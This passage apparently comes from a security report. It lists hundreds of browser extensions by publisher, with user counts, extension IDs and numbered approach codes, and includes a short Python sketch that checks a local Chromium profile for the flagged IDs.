SharpGrip 3,000,000 nlpopfilalpnmgodjpobmoednbecjcnh 1, 2, 4
Block Site Ex 20,000 nnkkgbabjapocnoedeaifoimlbejjckj 1, 2, 4
PageTurn Book Reader 1,000,000 oapldohmfnnhaledannjhkbllejjaljj 1, 2, 4
FocusShield 4,000,000 ohdkdaaigbjnbpdljjfkpjpdbnlcbcoj 1, 2, 4
Loudify Volume Booster 7,000,000 ohlijedbbfaeobchboobaffbmpjdiinh 1, 2, 4
ChatGPT Toolkit 6,000,000 okanoajihjohgmbifnkiebaobfkgenfa 4
Pac Man Tribute 3,000,000 okkijechcafgdmbacodaghgeanecimgd 1, 2, 4
Wordle Timeless 3,000,000 pccilkiggeianmelipmnakallflhakhh 4
Web Paint Online 3,000,000 pcgjkiiepdbfbhcddncidopmihdekemj 1, 2, 4
Live Screen Recorder 4,000,000 pcjdfmihalemjjomplpfbdnicngfnopn 1, 2, 4
Screenshot Master 6,000,000 pdlmjggogjgoaifncfpkhldgfilgghgc 1, 2, 4
Emojet - Emoji Keyboard 4,000,000 pgnibfiljggdcllbncbnnhhkajmfibgp 1, 2, 4
Metric Spy 2,000,000 plifocdammkpinhfihphfbbnlggbcjpo 1, 2, 4
Tetris Classic 6,000,000 pmlcjncilaaaemknfefmegedhcgelmee 1, 2, 4
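The extension IDs listed in these tables can be checked against a local browser profile. Chromium-based browsers store each installed extension in a directory named after its 32-character ID, so a simple intersection is enough. This is a minimal sketch, not a removal tool; the profile path varies by OS and browser, and the helper names (`installed_extension_ids`, `flagged`) are illustrative, not from the report.

```python
# Sketch: compare a Chromium profile's installed extensions against IDs
# from the tables above. Profile path and helper names are assumptions;
# the on-disk layout (Extensions/<32-char id>/) is standard for
# Chromium-based browsers.
from pathlib import Path


def installed_extension_ids(profile_dir: str) -> set[str]:
    """Return the set of extension IDs installed under a profile directory."""
    ext_root = Path(profile_dir).expanduser() / "Extensions"
    if not ext_root.is_dir():
        return set()
    # Extension IDs are exactly 32 characters drawn from the letters a-p.
    return {p.name for p in ext_root.iterdir()
            if p.is_dir() and len(p.name) == 32}


def flagged(profile_dir: str, bad_ids: set[str]) -> set[str]:
    """IDs from the report that are present in the given profile."""
    return installed_extension_ids(profile_dir) & bad_ids
```

Typical profile locations are `~/.config/google-chrome/Default` on Linux or `~/Library/Application Support/Google/Chrome/Default` on macOS; a match only means the ID is present, so verify before removing.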

ZingFront / ZingDeck / BigMData

Name Weekly active users Extension ID Approaches
Download Telegram - TG Video Photo Download 1,000 aaanclnbkhoomaefcdpcoeikacfilokk 1
Open AI ChatGPT for Email - GMPlus 40,000 abekedpmkgndeflcidpkkddapnjnocjp 1, 5
AI Cover Letter Generator - Supawork AI 2,000 aceohhcgmceafglcfiobamlbeklffhna 1, 2
AI Headshot Generator - Supawork AI 5,000 acgbggfkaphffpbcljiibhfipmmpboep 1, 6
IG Follower Export Tool - IG Email Extractor 10,000 acibfjbekmadebcjeimaedenabojnnil 1
WA Sender - Bulk Message & WA Message & Bulk Sender Tool 3,000 aemhfpfbocllfcbpiofnmacfmjdmoecf 1, 5
Save Ins Comment - Export Ins Comments 1,000 afkkaodiebbdbneecpjnfhiinjegddco 1
Coursera Summary with ChatGPT and Take Notes 3,000 afmnhehfpjmkajjglfakmgmjcclhjane 1, 2, 5
Extension Manager for Chrome™ 966 ahbicehkkbofghlofjinmiflogakiifo 1, 5
Email Finder & Email Hunter - GMPlus 10,000 aihgkhchhecmambgbonicffgneidgclh 1, 5
Sora Video To Video - Arting AI 106 aioieeioikmcgggaldfknjfoeihahfkb 1, 2
ChatGPT for 知乎 415 ajnofpkfojgkfmcniokfhodfoedkameh 1, 2, 5
Walmart Finder&ChatGPT Review Analysis 457 akgdobgbammbhgjkijpcjhgjaemghhin 5
WA Bulk Message Sender - Premium Sender 1,000 amokpeafejimkmcjjhbehganpgidcbif 1
One-Click Search Aliexpress Similar Products 97 aobhkgpkibbkonodnakimogghmiecend 5
Summary with Bing Chat for YouTube 9,000 aohgbidimgkcolmkopencknhbnchfnkm 1, 5
Rakuten Customer Service Helper 42 apfhjcjhmegloofljjlcloiolpfendka 5
ChatBot AI - ChatGPT & Claude & Bard & Bing 883 apknopgplijcepgmlncjhdcdjifhdmbo 4, 5
NoteGPT: YouTube Summary, Webpages & PDF Summary 200,000 baecjmoceaobpnffgnlkloccenkoibbb 5
Dimmy - Discord Chat Exporter 252 bbgnnieijkdeodgdkhnkildfjbnoedno 1
Gmail Notes - Add notes to email in Gmail 1,000 bbpgdlmdmlalbacneejkinpnpngnnghj 5
Sora Image To Video - Arting AI 372 bdhknkbhmjkkincjjmhibjeeljdmelje 1, 2
Tiktok Customer Service Helper 66 bdkogigofdpjbplcphfikldoejopkemf 5
TikClient - Web Client for TikTok™ 10,000 beopoaohjhehmihfkpgcdbnppdeaiflc 1, 2, 6
One-Click Search Amazon Similar Products 146 bfeaokkleomnhnbhdhkieoebioepbkkb 5
Custom New Tab Page 864 bfhappcgfmpmlbmgbgmjjlihddgkeomd 5
Shopee Downloader - Download Videos & Images 3,000 bfmonflmfpmhpdinmanpaffcjgpiipom 1, 2, 5
Product Photography - Ai Background Generator For Prouduct Photos 46 bgehgjenjneoghlokaelolibebejljlh 1, 2
TikGPT: Tiktok Listing Optimizer 665 bhbjjhpgpiljcinblahaeaijeofhknka 5
Find WhatsApp Link - Group Invite Link 2,000 biihmgacgicpcofihcijpffndeehmdga 1, 5
VideoTG - Download & Save telegram Videos Fast & one time! 4,000 bjnaoodhkicimgdhnlfjfobfakcnhkje 1
Etsy™ AI Review Analysis & Download 8,000 bjoclknnffeefmonnodiakjbbdjdaigf 5
iGoo Helper - Security Privacy Unblock VPN 20,000 bkcbdcoknmfkccdhdendnbkjmhdmmnfc 5
TikTok Analytics & Sort Video by Engagement 1,000 bnjgeaohcnpcianfippccjdpiejgdfgj 5
Rakuten AI Listing editor 68 cachgfjiefofkmijjdcdnenjlljpiklj 5
Invite All Friends for Facebook™ in one click 10,000 cajeghdabniclkckmaiagnppocmcilcd 5
EbayGPT: ChatGPT Ebay listing optimization 2,000 cbmmciaanapafchagldbcoiegcajgepo 5
Comment Exporter 10,000 cckachhlpdnncmhlhaepfcmmhadmpbgp 1, 2
Twitch Danmaku(NicoNico style) 646 cecgmkjinnohgnokkfmldmklhocndnia 5
Easy Exporter - Etsy order exporter 2,000 cgganjhojpaejcnglgnpganbafoloofa 5
Privacy Extension for WhatsApp Privacy 100,000 cgipcgghboamefelooajpiabilddemlh 1, 2
Group Extractor for social media platform 1,000 chldekfeeeaolinlilgkeaebbcnkigeo 6
Sales Sort for eBay™ Advanced Search 4,000 cigjjnkjdjhhncooaedjbkiojgelfocc 1, 2, 3, 5
Amazon Customer Service Helper 70 cmfafbmoadifedfpkmmgmngimbbgddlo 5
Currency Conversion Calculator 2,000 cmkmopgjpnjhmlgcpmagbcfkmakeihof 5
LinkedRadar-Headline Generator for LinkedIn™ 1,000 cnhoekaognmidchcealfgjicikanodii 1, 5
AllegroGPT:ChatGPT for Allegro Open AI Writer 163 coljimimahbepcbljijpimokkldfinho 5
ai voice cover 518 cpjhnkdcdpifokijolehlmomppnfflop 1
WA Contacts Extractor 30,000 dcidojkknfgophlmohhpdlmoiegfbkdd 1
Twitch chat overlay on fullscreen 832 dckidogeibljnigjfahibbdnagakkiol 5
Privacy Extension for WhatsApp Privacy 660 dcohaklbddmflhmcnccgcajgkfhchfja 1
LINE App Translator Bot - LINE Chat 1,000 dimpmploihiahcbbdoanlmihnmcfjbgf 5
Etsy Image Search 1,000 dkgoifbphbpimdbjhkbmbbhhfafjdilp 5
AliExpress & eBay - Best price 575 dkoidcgcbmejimkbmgjimpdgkgilnncj 5
AliGPT: Aliexpress Listing Optimize 1,000 dlbmngbbcpeofkcadbglihfdndjbefce 5
Best ASO Tools for Google Play Store 10,000 doffdbedgdhbmffejikhlojkopaleian 5
NoteGPT: AI Flashcard for Quizlet and Cram 10,000 eacfcoicoelokngmcgkkdakohpaklgmk 1, 2, 5
ChatSider AI Copilot : ChatGPT & Claude 2,000 ecnknpjoomhilbhjipoipllgdgaldhll 6
Mercadolivre Customer Service Helper with GPT 19 edhpagpcfhelpopmcdjeinmckcjnccfm 5
WA Contacts Extractor Free Extension 30,000 eelhmnjkbjmlcglpiaegojkoolckdgaj 1, 6
Unlimited Summary Generator for YouTube™ 70,000 eelolnalmpdjemddgmpnmobdhnglfpje 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 10,000 efaadoiclcgkpnjfgbaiplhebcmbipnn 1, 2
Ebay Kundendiensthelfer mit GPT 123 efknldogiepheifabdnikikchojdgjhb 5
Extension Manager 8,000 efolofldmcajcobffimbnokcnfcicooc 5
Send from Gmail - Share a Link Via Email 5,000 egefdkphhgpfilgcaejconjganlfehif 1, 3, 5
Followers Exporter for Ins 100,000 ehbjlcniiagahknoclpikfjgnnggkoac 1, 2
Website Keyword Extractor & Planner Tool 10,000 eiddpicgliccgcgclfoddoiebfaippkj 6
AMZ Currency Converter —— Amazon TS 457 ekekfjikpoacmfjnnebfjjndfhlldegj 1
eCommerce Profit Calculator 3,000 elclhhlknlgnkbihjkneaolgapklcakh 1, 2, 5
ChatGPT for Google (No Ads) 30,000 elnanopkpogbhmgppdoapkjlfigecncf 1, 3, 5
AI Resume Builder - Supawork AI 9,000 epljmdbeelhhkllonphikmilmofkfffb 1, 4
aliexpress image video download 1,000 epmknedkclajihckoaaoeimohljkjmip 5
InstaNote: Download and Save Video for IG 10,000 fbccnclbchlcnpdlhdjfhbhdehoaafeg 1, 2, 5
Ebay Niche Finder&ChatGPT Review Analysis 419 fencfpodkdpafgfohkcnnjjepolndkoc 5
One-Click Search Etsy Similar Products 83 fffpcfejndndidjbakpmafngnmkphlai 5
WA Link Generator 315 fgmmhlgbkieebimhondmhbnihhaoccmj 1
AI Script Writer & Video to Text for TikTok 9,000 fhbibaofbmghcofnficlmfaoobacbnlm 1, 2, 5
WA Bulk Message Sender 100,000 fhkimgpddcmnleeaicdjggpedegolbkb 1, 5
Free VPN For Chrome - HavenSurf VPN 3,000 fnofnlokejkngcopdkaopafdbdcibmcm 5
McdGPT: Mercadolivre AI Listing edit 340 fpgcecmnofcebcocojgbnmlakeappphj 5
CRM Integration with LinkedIn for Salesforce 411 fpieanbcbflkkhljicblgbmndgblndgh 5
Online Photoshop - Photo Editor Tool 577 fplnkidbpmcpnaepdnjconfhkaehapji 1, 2, 5
Telegram Private Video Downloader 20,000 gdfhmpjihkjpkcgfoclondnjlignnaap 1, 2
AI Signature Generator - SignMaker 74 gdkcaphpnmahjnbbknailofhkdjgonjp 1, 2, 5
Privacy Extension for WhatsApp Web 2,000 gedkjjhehhbgpngdjmjoklficpaojmof 1
One-Click Search Shein Similar Products 232 gfapgmkimcppbjmkkomcjnamlcnengnp 5
Summary with ChatGPT for Google and YouTube 10,000 gfecljmddkaiphnmhgaeekgkadnooafb 1, 2, 5
ESale - Etsy™ SEO tool for seller 10,000 ghnjojhkdncaipbfchceeefgkkdpaelk 5
Twitter Video Downloader 10,000 giallgikapfggjdeagapilcaiigofkoe 1, 2, 5
Video Downloader and Summary for TikTok 3,000 gibojgncpopnmbjnfdgnfihhkpooodie 1, 2, 5
Audio Recorder Online - Capture Screen Audio 3,000 gilmhnfniipoefkgfaoociaehdcmdcgk 1, 2, 5
WalmartGPT:ChatGPT for Walmart Open AI Writer 682 gjacllhmphdmlfomfihembbodmebibgh 5
ChatShopee - AI Customer Service Helper 88 glfonehedbdfimabajjneobedehbpkcf 5
Magic VPN - Best Free VPN for Chrome 5,000 glnhjppnpgfaapdemcpihhkobagpnfee 5
Translate and Speak Subtitles for YouTube 40,000 gmimaknkjommijabfploclcikgjacpdn 1, 2, 3, 5
Messenger Notifier 3,000 gnanlfpgbbiojiiljkemdcampafecbmk 5
One-Click Search Walmart Similar Products 103 golgjgpiogjbjbaopjeijppihoacbloi 5
TikTok Hashtags Tool - Hashtags Analytics 779 haefbieiimgmamklihjpjhnhfbonfjgg 1, 5
Gmail Checker - Multi Account Gmail Notifier 9,000 hangbmidafgeohijjheoocjjpdbpaaeh 1, 5
Bulk Message Sender for wa 281 hcbplmjpaneiaicainjmanjhmdcfpeji 2
APP For IG DM 10,000 hccnecipbimihniebnopnmigjanmnjgh 1, 2, 5
Likes Exporter 6,000 hcdnbmbdfhhfjejboimdelpfjielfnde 1, 2
ChatsNow: ChatGPT AI Sidebar ( GPT, Claude , Gemini) 20,000 hcmiiaachajoiijecmakkhlcpagafklj 1, 2, 5
iTextMaster - ChatPDF & PPT AI with ChatGPT 6,000 hdofgklnkhhehjblblcdfohmplcebaeg 1, 2, 3, 5
Shopify™ Raise - Shopify™ store analysis tool 10,000 hdpfnbgfohonaplgnaahcefglgclmdpo 1, 2, 3
ShopeeGPT - Optimize Titles & Descriptions 713 hfgfkkkaldbekkkaonikedmeepafpoak 5
Telegram Desktop - Telegram Online Messenger 4,000 hifamcclbbjnekfmfgcalafnnlgcaolc 5
CommentGPT - Shopee review analysis assistant 321 hjajjdbieadchdmmifdjgedfhgdnonlh 5
Vimeo™ Downloader and chatGPT Video Summary 40,000 hobdeidpfblapjhejaaigpicnlijdopo 1, 2, 5
IG Comment Export Tool 4,000 hpfnaodfcakdfbnompnfglhjmkoinbfm 1, 2, 5
SEO Search Keyword Tool 40,000 hpmllfbpmmhjncbfofmkkgomjpfaocca 5
IG Video Downloader - SocialPlus 5,000 iaonookehgfokaglaodkeooddjeaodnc 1, 2, 5
AdLibNote: Video Downloader for Facebook™ 10,000 icphfngeemckldjnnoemfadfploieehk 1, 2, 5
IGExporter - IG Follower Export Tool 2,000 iffbofdalhbflagjclkhbkbknhiflcam 1, 2, 5
Wasup Translator - Translate WhatsApp Messages 328 ifhamodfnpjalblgmnpdidnkjjnmkbla 1, 5
Free VPN For Chrome - HavenSurf VPN 1,000 ihikodioopffhlfhlcjafeleemecfmab 5
TelePlus - Multi-Accounts Sender 8,000 ihopneheidomphlibjllfheciogojmbk 1, 2, 5
Keywords Explorer For Google Play Store (ASO) 2,000 ijegkehhlkpmicapdfdjahdmpklimdmp 6
Mass follow for Twitter 1,000 ijppobefgfjffcajmniofbnjkooeneog 1, 5
Etsy Customer Service Helper with ChatGPT 506 ikddakibljikfamafepngmlnhjilbcci 5
Telegram Group and Channel Search Tool 7,000 ilpgiemienkecbgdhdbgdjkafodgfojl 1, 2, 5, 7
NoteGPT: Udemy Summary with ChatGPT & Claude 8,000 indcipieilphhkjlepfgnldhjejiichk 1, 2, 5
Volume booster - Volumax 2,000 ioklejjbhddpcdgmpcnnpaoopkcegopp 6
AmzGPT: Amazon listing edit 4,000 jijophmdjdapikfmbckmhhiheghkgoee 5
TTNote: Video Downloader and Saver 30,000 jilgamolkonoalagcpgjjijaclacillb 1, 2, 5
GS Helper For Google Search Google Scholar 2,000 jknbccibkbeiakegoengboimefmadcpn 5
WASender - WA Bulk Message Sender 1,000 jlhmomandpgagmphfnoglhikpedchjoa 1
ai celebrity voice clone 572 jlifdodinblfbkbfmjinkpjieglkgfko 1
WAPlus CRM - Best WhatsApp CRM with AI 60,000 jmjcgjmipjiklbnfbdclkdikplgajhgc 1
Save Webpage As PDF 10,000 jncaamlnmeladalnajhgbkedibfjlmde 5
Etsy™ Reviews Extractor 1,000 jobjhhfnfkdkmfcjnpdjmnmagepnbifi 5
AI Image Generator: Get AI Art with Any Input 1,000 jojlhafjflilmhpakmmnchhcbljgmllh 5
TG Sender - TG bulk message send and invite 20,000 kchbblidjcniipdkjlbjjakgdlbfnhgh 1, 2, 5
QR Code Generator 25 kdhpgmfhaakamldlajaigcnanajekhmp 1
Browser VPN - Free and unlimited VPN proxy 7,000 kdjilbflpbbilgehjjppohpfplnapkbp 5
Summary Duck Assistant 1,000 kdmiipofdmffkgfpkigioehfdehcienf 1, 2
FindNiche - aliexpress™ dropshipping & analytics tool 1,000 kgggfelpkelliecmgdmfjgnlnhfnohpi 2, 3, 5
LinkedRadar - Email Finder for LinkedIn ™ 50,000 kgpckhbdfdhbkfkepcoebpabkmnbhoke 1, 5
WA - Download Group Phone Numbers 4,000 khajmpchmhlhfcjdbkddimjbgbchbecl 1, 5
WA Self Sender for WhatsApp Web(Easy Sender) 10,000 khfmfdepnleebhonomgihppncahojfig 1
GPT for Ecom: Product Listing optimizer 20,000 khjklhhhlnbeponjimmaoeefcpgbpgna 1, 2, 5
IG Follower Export Tool - IG Tools 100,000 kicgclkbiilobmccmmidfghnijgfamdb 1, 2, 5
WhatsApp Realtime Translate&Account Warm Up&Voice message Transcript 1,000 kifbmlmhcfecpiidfebchholjeokjdlm 1, 5
WA Group Sender 10,000 kilbeicibedchlamahiimkjeilnkgmeo 5
FindNiche - Shopify™ store traffic analysis 7,000 kiniklbpicchjlhhagjhchoabjffogni 1, 2, 3, 5, 7
Telegram Restricted Content Downloader 7,000 kinmpocfdjcofdjfnpiiiohfbabfhhdd 1, 2
website broken link and 404 error checker 10,000 kkjfobdnekhdpmgomkpeibhlnmcjgian 1, 2, 5
TG Content Downloader - download telegram restricted files 983 kljkjamilbfohkmbacbdongkddmoliag 1, 5
Comment Assistant In LinkedIn™ 978 kmchjegahcidgahijkjoaheobkjjgkfj 5
Tab Manager - Smart Tab By NoteGPT AI 7,000 kmmcaankjjonnggaemhgkofiblbjaakf 1, 2, 5
WA Number Checker 5,000 knlfobadedihfdcamebpjmeocjjhchgm 1, 2
Telegram downloader - TG Video Photo Download 4,000 kofmimpajnbhfbdlijgcjmlhhkmcallg 1
WA Group Link Finder 2,000 kpinkllalgahfocbjnplingmpnhhihhp 1, 2
One-Click Search Ozon Similar Products 96 laoofjicjkiphingbhcblaojdcibmibn 5
WADeck - WA AI ChatBot &WhatsApp Sender 40,000 lbjgmhifiabkcifnmbakaejdcbikhiaj 1, 5
AliNiche Finder&ChatGPT Review Analysis 484 ldcmkjkhnmhoofhhfendhkfmckkcepnj 5
Fashion Model-AI Model Generator For Amazon 1,000 ldlimmbggiobfbblnjjpgdhnjdnlbpmo 1, 5
WhatsApp Group Management Pro - Export, Broadcast & Monitor Suite 20,000 ldodkdnfdpchaipnoklfnfmbbkdoocej 1, 2, 5
Photo download & Save image 8,000 leiiofmhppbjebdlnmbhnokpnmencemf 5
Aliexpress Customer Service Helper 191 lfacobmjpfgkicpkigjlgfjoopajphfc 5
Find WhatsApp Link - Group Invite Link 10,000 lfepbhhhpfohfckldbjoohmplpebdmnd 5
Yahoo - optimize listing & AI Writer 69 lgahpgiabdhiahneaooneicnhmafploc 5
Amazon Finder&ChatGPT Review Analysis 821 lgghbdmnfofefffidlignibjhnijabad 5
AI Resume Builder - LinkedRadar 10,000 lijdbieejfmoifapddolljfclangkeld 1, 4
Article Summary with ChatGPT and Take Notes 8,000 llkgpihjneoghmffllamjfhabmmcddfh 1, 2, 5
AliNiche - AliExpress™ Product Research Tool 30,000 lmlkbclipoijbhjcmfppfgibpknbefck 1, 2, 5
ModelAgents - AI Fashion Models Generator 5,000 lmnagehbedfomnnkacohdhdcglefbajd 5
Gmail Address Check & Send Verify Tool 2,000 lmpigfliddkbbpdojfpbbnginolfgdoh 5
WA Number Checker - Check & Verify WA Number 5,000 lobgnfjoknmnlljiedjgfffpcbaliomk 1
Free AI Voice: Best Text to Speech Tool 1,000 lokmkeahilhnjbmgdhohjkofnoplpmmp 5
IG Email Extractor - Ins Followers Exporter 3,000 lpcfhggocdlchakbpodhamiohpgebpop 1, 5
WA Bulk Sender 5,000 mbmlkjlaognpikjodedmallbdngnpbbn 1
YouTube Comment Summary with ChatGPT OpenAI 3,000 mcooieiakpekmoicpgfjheoijfggdhng 5
Ad Library - Ads Spy Tool For YouTube™ 2,000 mdbhllcalfkplbejlljailcmlghafjca 5
Schedule Email by Gmail 862 mdndafkgnjofegggbjhkccbipnebkmjc 1, 5
Feature Graphic Downloader for Play Store 546 meibcokbilaglcmbboefiocaiagghdki 5
One-Click Search eBay Similar Products 75 mjibhnpncmojamdnladbfpcafhobhegn 5
Twiclips - Twitch Clip Downloader 8,000 mjnnjgpeccmgcobgegepeljeedilebif 1, 2, 5
Auto Connect for LinkedIn™ - LeadRadar 1,000 mliipdijmfmbnemagicfibpffnejhcki 1
Easy Web Data Scraper 40,000 mndkmbnkepbhdlkhlofdfcmgflbjggnl 1, 2, 3, 5
wa privacy 68 nccgjmieghghlknedlgoeljlcacimpma 1
Ad Library - Ads Spy Tool For Pinterest™ 2,000 ndopljhdlodembijhnfkididjnahadoj 5
Universal Keyword Planner box 5,000 niaagjifaifoebkdkkndbhdoamicolmj 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 30,000 niepmhdjjdggogblnljbdflekfohknmc 1, 2
WA Group Sender & Group Link Scraper 1,000 nimhpogohihnabaooccdllippcaaloie 1, 2
Ad Library - Ads Spy Tool For Twitter™ 1,000 nkdenifdmkabiopfhaiacfpllagnnfaj 5
TikTok Video Tags Summary with ChatGPT 860 nmccmoeihdmphnejppahljhfdggediec 5
Image Zoom Tool 5,000 nmpjkfaecjdmlebpoaofafgibnihjhhf 1, 2, 5
ChatSider:Free ChatGPT Assistant(GPT4) 1,000 nnadblfkldnlfoojndefddknlhmibjme 7
Telegram Channels - TG Channel Link Search 1,000 nnbjdempfaipgaaipadfgfpnjnnflakl 5
H1B Sponsor Checker, Job Seek - LinkedRadar 463 noiaognlgocndhfhbeikkoaoaedhignb 1, 4, 5
WAContactSaver 7,000 nolibfldemoaiibepbhlcdhjkkgejdhl 1
vk video downloader - vkSaver 10,000 npabddfopfjjlhlimlaknekipghedpfk 1, 2, 5
Multi Chat - All Chat In One For You - SocialPlus 1,000 oaknbnbgdgflakieopfmgegbpfliganc 1, 2, 5
Twitch Channel Points Auto Claimer -Twiclips 3,000 ocoimkjodcjigpcgfbnddnhfafonmado 5
WalmartHunt-Walmart Dropshipping Tools 4,000 oeadfeokeafokjbffnibccbbgbjcdefe 1, 2, 5
TTAdNote: Download and Save Ad No Watermark 8,000 oedligoomoifncjcboehdicibddaimja 1, 2, 5
Discordmate - Discord Chat Exporter 20,000 ofjlibelpafmdhigfgggickpejfomamk 5
Social Media Downloader - SocialPlus 4,000 ofnmkjeknmjdppkomohbapoldjmilbon 1
NoteGPT: ChatGPT Summary for Vimeo 5,000 oihfhipjjdpilmmejmbeoiggngmaaeko 1, 2, 5
Aliexpress search by image 5,000 ojpnmbhiomnnofaeblkgfgednipoflhd 1, 2, 5
Privacy Extension for WhatsApp Web 4,000 okglcjoemdnmmnodbllbcfaebeedddod 1
Denote: Save Ads TikTok & FB Ad Library 40,000 okieokifcnnigcgceookjighhplbhcip 1, 2
Allegro Customer Service Helper with Open AI 13 olfpfedccehidflokifnabppdkideeee 5
LinkedRadar - LinkedIn Auto Connect Tool 198 onjifbpemkphnaibpiibbdcginjaeokn 1
WAPI - Send personalized messages 20,000 onohcnjmnndegfjgbfdfaeooceefedji 1
Entrar for Gmail™ 5,000 oolgnmaocjjdlacpbbajnbooghihekpp 5
Group exporter 2 19 opeikahlidceaoaghglikdpfdkmegklg 1
Keyword Finder-SEO keywords Tool 5,000 oppmgphiknonmjjoepbnafmbcdiamjdh 5
Search Engine Featuring ChatGPT - GPT Search 775 pbeiddaffccibkippoefblnmjfmmdmne 1, 5
Amazon Price History Tracker - AmzChart 737 pboiilknppcopllbjjcpdhadoacfeedk 5
Shopify Wise - Shopify analytics & Dropship tool 762 pckpnbdneenegpkodapaeifpgmneefjd 5
Vimeo™ Video Downloader Pro 70,000 penndbmahnpapepljikkjmakcobdahne 5
DealsUpp - Contact Saver for WA 2,000 pfomiledcpfnldnldlffdebbpjnhkbbl 1, 5
Profile Scraper - Leadboot 2,000 pgijefijihpjioibahpfadkabebenoel 1
-com Remove Background 105 pgomkcdpmifelmdhdgejgnjeehpkmdgl 1
EasyGood - Free Unlimited VPN Proxy 1,000 pgpcjennihmkbbpifnjkdpkagpaggfaa 5
FindNiche - AliExpress™ Data Exporter 114 pjjofiojigimijfomcffnpjlcceijohm 5
Share Preview Save to Social 419 pkbmlamidkenakbhhialhdmmkijkhdee 1, 3
Voice Remaker - The Best AI Generator 10,000 pnlgifbohdiadfjllfmmjadcgofbnpoi 1, 5
Pincase-Pinterest Video & Image Downloader 10,000 poomkmbickjilkojghldlelgjmgaabic 5
Ad Library - Ad Finder & Adspy Tool 30,000 ppbmlcfgohokdanfpeoanjcdclffjncg 5
YouTube Video Tags Summary with ChatGPT 908 ppfomhocaedogacikjldipgomjdjalol 1, 5

ExtensionsBox

Name Weekly active users Extension ID Approaches
Amazon Reviews Extractor 1,000 aapmfnbcggnbcghjipmpcngmflbjjfnb 1, 2
Target Images Downloader 100 adeimcdlolcpdkaapelfnacjjnclpgpb 2
Airbnb Images Downloader 433 alaclngadohenllpjadnmpkplkpdlkni 1, 2
eBay Reviews Extractor 200 amagdhmieghdldeiagobdhiebncjdjod 2
Lazada Images Downloader 363 bcfjlfilhmdhoepgffdgdmeefkmifooo 1, 2
Shopify2Woo - Shopify to WooCommerce 543 bfnieimjkglmfojnnlillkenhnehlfcj 1, 2
Group Extractor 3,000 bggmbldgnfhohniedfopliimbiakhjhj 1, 2
Shein Reviews Extractor - Scrape Data to CSV 388 bgoemjkklalleicedfflkkmnnlcflnmd 1, 2
Airbnb Reviews Extractor 86 bklllkankabebbiipcfkcnmcegekeagj 1, 2
eBay Images Downloader 863 bkpjjpjajaogephjblhpjdmjmpihpepm 1, 2
Indeed Scraper 2,000 bneijclffbjaigpohjfnfmjpnaadchdd 1, 2
Shein to Shopify CSV Exportor 130 cacbnoblnhdipbdoimjhkjoonmgihkec 1, 2
Justdial Scraper 1,000 ccnfadfagdjnaehnpgceocdgajgieinn 1, 2
AI Review Summarizer - Get ChatGPT Review Analysis in One Click 24 cefjlfachafjglgeechpnnigkpcehbgf 2
Booking Hotel Scraper 123 cgfklhalcnhpnkecicjabhmhlgekdfic 1, 2
Contact Extractor for wa 2,000 chhclfoeakpicniabophhhnnjfhahjki 2
AI Reviews Summary for Google Maps 17 cmkkchmnekbopphncohohdaehlgpmegi 2
AliExpress Images Downloader 938 cpdanjpcekhgkcijkifoiicadebljobn 1, 2
Shopy - Shopify Spy 2,000 dehlcjmoincicbhdnkbnmkeaiapljnld 1, 2
Profile Scraper for LinkedIn™ 473 dmonpchcmpmiehffgbkoimkmlfomgmbc 1, 2
Trustpilot Reviews Extractor 481 eikaihjegpcchpmnjaodjigdfjanoamn 1, 2
Indeed Review Extractor 17 ejmkpbellnnjbkbagmgabogfnbkcbnkb 1, 2
AliExpress Reviews Extractor 409 elcljdecpbphfholhckkchdocegggbli 1, 2
Etsy Reviews Extractor 306 fbbobebaplnpchmkidpicipacnogcjpk 2
Post Scraper 34 fcldaoddodeaompgigjhplaalfhgphfo 2
Images Downloader for WM 707 fdakeeindhklmojjbfjhgmpodngnpcfk 1, 2
Twitch Chat Downloader 132 fkcglcjlhbfbechmbmcajldcfkcpklng 1, 2
Costco Images Downloader 35 fpicpahbllamfleebhiieejmagmpfepi 1, 2
Etsy Images Downloader 1,000 gbihcigegealfmeefgplcpejjdcpenbo 2
Yelp Scraper 347 gbpkfnpijffepibabnledidempoaanff 2
Lazada Reviews Extractor 102 gcfjmciddjfnjccpgijpmphhphlfbpgl 1, 2
Shopee Reviews Extractor 484 gddchobpnbecooaebohmcamdfooapmfj 2
Comments Exporter for Ins 47 gdhcgkncekkhebpefefeeahnojclbgeg 1, 2
Wayfair Images Downloader 169 ggcepafcjdcadpepeedmlhnokcejdlal 2
Amazon Images Downloader 1,000 ggfhamjeclabnmkdooogdjibkiffdpec 1, 2
Shein Images Downloader 3,000 ghnnkkhikjclkpldkbdopbpcocpchhoi 1, 2
Reviews Extractor for WM 369 gidbpinngggcpgnncphjnfjkneodombd 2
Zillow Scraper - Agent & Property Export 308 gjhcnbnbclgoiggjlghgnnckfmbfnhbb 2
G2 Reviews Extractor 189 hdnlkdbboofooabecgohocmglocfgflo 1, 2
X Jobs Scraper 35 hillidkidahkkchnaiikkoafeaojkjip 1, 2
Booking Reviews Extractor 201 iakjgojjngekfcgbjjiikkhfcgnejjoa 1, 2
Shein Scraper 1,000 ibbjcpcbjnjlpfjinbeeefbldldcinjg 1, 2
Shopee Images Downloader 966 idnackiimdohbfkpcpoakocfkbenhpdf 2
Yellow Pages Scraper 2,000 iijgmfjjmcifekbfiknmefbkgbolonac 1, 2
Booking Images Downloader 27 ilcbmjpkggalcdabgpjacepgmkpnnooh 1, 2
Likes Exporter for Ins 126 jdfpnhobcnlokhaoihecmgmcnpjnhbmm 1, 2
Job Scraper for LinkedIn™ 1,000 jhmlphenakpfjkieogpinommlgjdjnhb 2
Wayfair Reviews Extractor 186 jjmejjopnabkbaojcijnfencoejjaikb 1, 2
XExporter - Export Twitter Followers 908 kfopfmdjhlpocbhhddjmhhboigepfpkg 1, 2
Costco Reviews Extractor 31 lbihigmoeinmajbmkbibikknphemncdl 1, 2
Pinterest Images Downloader - Pinterest Video Downloader 2,000 lephhdmcccfalhjdfpgilpekldmcahbb 1, 2
Shein to Woo CSV Exportor 66 lhjakenfnakjjfgfcoojdeblfmbpkocf 1, 2
Image & Video Downloader for Ins 358 ljgaknjbenmacaijcnampmhlealmbekk 2
Comments Exporter 307 llcgplklkdgffjmhlidafnajbhbohgen 1, 2
Yelp Reviews Extractor 59 mnmjkjlaepijnbgapohecanhklhoojbh 1, 2
TKCommentExport - Export TikTok Comments 1,000 monfhkhegpjfhcmjaklhnckkhlalnoml 1, 2
Chats Backup for wa 1,000 najkpicijahenooojdcnfdfncbaidcei 2
Slack™ Member Extractor 497 nbhjfblpkhiaiebipjcleioihpcclaea 1, 2
Glassdoor Scraper 387 ndnomcanokhgenflbdnkfjnhaioogmdk 1, 2
